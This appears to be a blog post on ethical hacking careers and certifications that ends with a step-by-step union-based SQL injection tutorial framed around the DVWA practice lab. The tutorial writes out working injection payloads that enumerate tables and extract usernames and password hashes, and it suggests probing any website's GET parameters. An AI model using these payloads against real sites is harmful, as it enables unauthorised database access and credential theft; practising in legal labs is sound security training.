Ethical Hacking Updates

There are three types of hacker.

white hat hacker(ethical hacker)
Grey hat hacker
Black hat hacker

 What is white hat hacker (ethical hacker)?

“Ethical hacker” at parameter security, which means companies hire an ethical hacker who tries to break into their computer networks to figure out how a real criminal would do it.

In short Ethical hacker hacking deals with breaking into computer network, system and internet by exploiting its weaknesses.

What is grey hat hacker?

Grey hat hackers may not necessarily perform hacking for their gain, unauthorised access to a system can be considered illegal and unethical.

The movement they cross that boundary, they become black hat hacker. A grey hat hacker surfs the Internet and hacks into a computer system to notify the administrator regarding some security defects in their system.

What is black hat hacker?

“Blackhat hacker” hack into the system with a bad intention for personal benefits and break down the system.

The black hat hacker may also make the exploit known to other hackers and the public without notifying the victim.

A black hat hacker, also known as a cracker or a dark side hacker, is someone who uses his skills with criminal intent.

The career in ethical hacking

Ethical hackers work for all organisations; they ensure data security and protect the computer system from illegal hacking activities.

There are no fixed criteria for becoming a hacker. Every company has own requirement, but a degree in computer science or information technology will lay an excellent foundation for your ethical hacking career.

If you want to become an ethical hacker, you may or may not have formal training. But getting formal training is always beneficial since it will help grow your career prospect.

Becoming a certified ethical hacker, or penetration tester is a famous goal among information security professionals.

Employment opportunities:

• Financial institution
• IT Company
• All online organisation and businesses
• Government
• Security agencies
• Defence organisation
• Telecommunication sector
• Forensic laboratories

 Salary-Certified Ethical Hacker

 The average payout to a Certified Ethical Hacker is $71,331 per annum. The salary ranges from $24,760 to $111,502, with a bonus payout between $0.00 and $17,500. Thus the total salary is approximately between $24,760 – $132,322

 One Million cybersecurity job openings Demand is expected to rise to 6 million globally by 2019.

 What is the best ethical hacking certification?

CPTE – Certified Penetration Testing Engineer

CompTIA – Security+

CSTA – Certified Security Testing Associate

GPEN – GIAC Certified Penetration Tester

OSCP – Offensive Security Certified Professional

CEH – Certified Ethical Hacker

ECSA – EC-Council Certified Security Analyst

CEPT – Certified Expert Penetration Tester

Related Career Paths

IT Security Specialist
Network Administrator
Technology Manager
IT Project Manager
Health Information Technician

Information security certifications

CompTIA

· Security+

· CSA+

· CASP

Cisco Systems

· CCNA Security

· CCNP Security

· CCIE Security

EC-Council

· CEH

· CNDA

EITC

· EITCA/IS

ISACA

· CISA

· CISM

· CRISC

(ISC)²

· CISSP

· SSCP

· ISSMP

· ISSEP

· ISSAP

Mile2

· CPTE

Offensive Security

· OSCP

· OSWP

· OSCE

· OSEE

· OSWE

eLearnSecurity

· eCPPT

GIAC

· GISF

· GSEC

· GCIA

· GCIH

· GCUX

· GCWN

· GCED

· GPEN

· GWAPT

· GAWN

· GICSP

· G7799

· GSNA

· GISP

· GSLC

· GCPM

· GSSP-JAVA

· GSSP-.NET

· GWEB

· GCFE

· GCFA

· GREM

· GNFA

· GLEG

· GSE

Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.